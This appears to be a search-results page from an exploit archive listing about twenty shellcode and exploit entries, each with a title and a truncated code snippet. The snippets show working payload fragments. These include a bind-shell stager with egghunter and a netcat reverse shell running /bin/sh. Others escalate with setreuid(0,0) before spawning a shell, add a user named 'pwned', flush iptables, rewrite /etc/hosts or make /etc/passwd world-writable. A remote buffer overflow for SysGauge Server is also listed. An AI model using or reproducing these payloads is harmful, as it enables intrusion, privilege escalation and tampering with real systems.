7260 matches found
Linux/x86-64 - Bind TCP Stager (4444/TCP) + Egghunter Shellcode (157 bytes)
;Exam Assignment 3 ;implementation of egghunter ;Default egg = "deaddead" ; ;If connected the stager check of egg , if present execute the code ; ;You can send a maximum of 255 bytes egg + code ; ;if no egg , shellcode exit ; ;Christophe G SLAE64 - 1337 ; global start jmp short start startcode :...
Linux/x86-64 - setreuid(0,0) + execve(/bin/ksh, [/bin/ksh, NULL]) + XOR Encoded Shellcode (87 bytes)
Title: Linux x86-64 setreuid 0,0 & execve"/bin/ksh", "/bin/ksh", NULL + XOR encoded - 87 bytes Author: egeektronic Twitter: @egeektronic Tested on: Slackware 13.37 Thanks: Mark Loiseau, entropy at phiral.net and metasm developer unsigned char shellcode =...
Linux/x86-64 - Reverse TCP (127.0.0.1:1337/TCP) Netcat (/bin/nc) Shell (/bin/sh) Shellcode (109 byte
; Title: Shellcode linux/x86-64 connect back shell ; Author : Gaussillusion ; Len : 109 bytes ; Language : Nasm ;syscall: execve"/bin/nc","/bin/nc","ip","1337","-e","/bin/sh",NULL BITS 64 xor rdx,rdx mov rdi,0x636e2f6e69622fff shr rdi,0x08 push rdi mov rdi,rsp mov rcx,0x68732f6e69622fff shr...
Linux/x86-64 - setreuid(0,0) + execve(/bin/csh, [/bin/csh, NULL]) + XOR Encoded Shellcode (87 bytes)
Title: Linux x86-64 setreuid 0,0 & execve"/bin/csh", "/bin/csh", NULL + XOR encoded - 87 bytes Author: egeektronic Twitter: @egeektronic Tested on: Slackware 13.37 Thanks: Mark Loiseau, entropy at phiral.net and metasm developer unsigned char shellcode =...
SysGauge Server 3.6.18 - Remote Buffer Overflow
Exploit Title: SysGauge Server 3.6.18 - Buffer Overflow Exploit Author: Ahmad Mahfouz Description: Sysgauge Server Unauthenticated Remote Buffer Overflow SEH Contact: http://twitter.com/eln1x Date: 12/01/2018 CVE: CVE-2018-5359 Version: 3.6.18 Tested on: Windows 7 x64 Software Link:...
Linux/x86-64 - setreuid(0,0) + execve(/bin/ash,NULL,NULL) + XOR Encoded Shellcode (85 bytes)
Title: Linux x86-64 setreuid 0,0 & execve"/bin/ash",NULL,NULL + XOR encoded - 85 bytes Author: egeektronic Twitter: @egeektronic Tested on: Slackware 13.37 Thanks: Mark Loiseau, entropy at phiral.net and metasm developer unsigned char shellcode =...
Linux/x86-64 - setreuid(0,0) + execve(/bin/zsh, [/bin/zsh, NULL]) + XOR Encoded Shellcode (87 bytes)
Title: Linux x86-64 setreuid 0,0 & execve"/bin/zsh", "/bin/zsh", NULL + XOR encoded - 87 bytes Author: egeektronic Twitter: @egeektronic Tested on: Slackware 13.37 Thanks: Mark Loiseau, entropy at phiral.net and metasm developer unsigned char shellcode =...
Linux/x86-64 - Add User (pwned/$pass$) Using echo cmd Shellcode (273 bytes)
; shellcode name adduserpassword ; Author : Christophe G SLAE64-1337 ; Len : 273 bytes ; Language : Nasm ; "name = pwned ; pass = $pass$" ; add user and password with echo cmd ; tested kali linux , kernel 3.12 global start start: jmp short findaddress realstart: pop rdi xor byte rdi + 7 , 0x41 ;...
Linux/x86-64 - Add User (pwned/$pass$) Using open,write,close Shellcode (358 bytes)
; shellcode name adduserpasswordJCPopen,write,close ; Author : Christophe G SLAE64-1337 ; Len : 358 bytes ; Language : Nasm ; "name = pwned ; pass = $pass$" ; add user and password with open,write,close ; tested kali linux , kernel 3.12 global start start: xor rax , rax push rax pop rsi push rax ...
Linux/x86-64 - Bind TCP (Random TCP Port) Shell Shellcode (57 bytes)
/ Shell Bind TCP Random Port Shellcode - C Language - Linux/x8664 Copyright C 2013 Geyslan G. Bem, Hacking bits http://hackingbits.com email protected This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free...
Linux/x86 - execve(/bin/sh) + Polymorphic Shellcode (26 bytes)
Linux/x86 - execve/bin/sh + Polymorphic Shellcode 26 bytes. Shellcode exploit for Linuxx86 platform / Description ; Title : Polymorphic execve /bin/sh - Shellcode ; Author : Hashim Jawad ; Website : ihack4falafel.com ; Twitter : @ihack4falafel ; SLAE ID : SLAE-1115 ; Purpose : spawn /bin/sh shell...
Linux/x86-64 - Flush IPTables Rules (execve("/sbin/iptables", ["/sbin/iptables", "-F"], NULL)) Shellcode (43 bytes)
Linux/x86-64 - Flush IPTables Rules execve"/sbin/iptables", "/sbin/iptables", "-F", NULL Shellcode 43 bytes. Shellcode ... / section .text global start start: push 0x3b pop rax cdq push rdx push word 0x462d push rsp pop rcx push rdx mov rbx, 0x73656c6261747069 push rbx mov rbx, 0x2f2f2f6e6962732f...
Linux/x86-64 - Execute /bin/sh Shellcode (24 bytes)
Linux/x86-64 - Execute /bin/sh Shellcode 24 bytes. Shellcode exploit for Linuxx86-64 platform / global start section .text start: push 59 pop rax cdq push rdx mov rbx,0x68732f6e69622f2f push rbx push rsp pop rdi push rdx push rdi push rsp pop rsi syscall / include include char code =...
Linux/x86-64 - Add Map (127.1.1.1 google.lk) In /etc/hosts Shellcode (96 bytes)
Linux/x86-64 - Add Map 127.1.1.1 google.lk In /etc/hosts Shellcode 96 bytes. Shellcode exploit for Linuxx86-64 platform / global start section .text start: ;open push 2 pop rax xor rdi, rdi push rdi ; 0x00 mov rbx, 0x7374736f682f2f2f ; ///hosts push rbx mov rbx, 0x2f2f2f2f6374652f ; /etc//// push...
IRIX - execve (/bin/sh) Shellcode (68 bytes)
/ 68 byte MIPS/Irix PIC execve shellcode. -scut/teso / unsigned long int shellcode = 0xafa0fffc, / sw $zero, -4$sp / 0x24067350, / li $a2, 0x7350 / / dpatch: / 0x04d0ffff, / bltzal $a2, dpatch / 0x8fa6fffc, / lw $a2, -4$sp / / a2 = char envp = NULL / 0x240fffcb, / li $t7, -53 / 0x01e07827, / nor...
Linux/StrongARM - setuid() Shellcode (20 bytes)
/ 20 byte StrongARM/Linux setuid shellcode funkysh / char shellcode= "\x02\x20\x42\xe0" / sub r2, r2, r2 / "\x04\x10\x8f\xe2" / add r1, pc, 4 / "\x12\x02\xa0\xe1" / mov r0, r2, lsl r2 / "\x01\x20\xc1\xe5" / strb r2, r1, 1 / "\x17\x0b\x90\xef"; / swi 0x90ff17 /...
IRIX - execve (/bin/sh -c) Shellcode (72 bytes)
char cmdshellcode= "\x04\x10\xff\xff" / bltzal $zero, / "\x24\x02\x03\xf3" / li $v0,1011 / "\x23\xff\x08\xf4" / addi $ra,$ra,2292 / "\x23\xe4\xf7\x40" / addi $a0,$ra,-2240 / "\x23\xe5\xfb\x24" / addi $a1,$ra,-1244 / "\xaf\xe4\xfb\x24" / sw $a0,-1244$ra / "\x23\xe6\xf7\x48" / addi $a2,$ra,-2232 /...
Linux/ARM - chmod(/etc/passwd, 0777) Shellcode (39 bytes)
/ Title : Linux/ARM - chmod"/etc/passwd", 0777 - 39 bytes Date : 2013-09-04 Author : gunslinger yuda at cr0security dot com Tested on : ARM1176 rev6 v6l An ARM Hardcoded Shellcode without 0x20, 0x0a, and 0x00. Cr0security.com / include char shellcode = "\x01\x60\x8f\xe2" // add r6, pc, 1...
Linux/ARM - creat(/root/pwned, 0777) Shellcode (39 bytes)
/ Title : Linux/ARM - creat"/root/pwned", 0777 - 39 bytes Date : 2013-09-04 Author : gunslinger yuda at cr0security dot com Tested on : ARM1176 rev6 v6l An ARM Hardcoded Shellcode without 0x20, 0x0a, and 0x00. Cr0security.com / include char shellcode = "\x01\x60\x8f\xe2" // add r6, pc, 1...
IRIX - stdin-read Shellcode (40 bytes)
/ 40 byte MIPS/Irix PIC stdin-read shellcode. -scut/teso / unsigned long int shellcode = 0x24048cb0, / li $a0, -0x7350 / / dpatch: / 0x0490ffff, / bltzal $a0, dpatch / 0x2804ffff, / slti $a0, $zero, -1 / 0x240fffe3, / li $t7, -29 / 0x01e07827, / nor $t7, $t7, $zero / 0x03ef2821, / addu $a1, $ra,...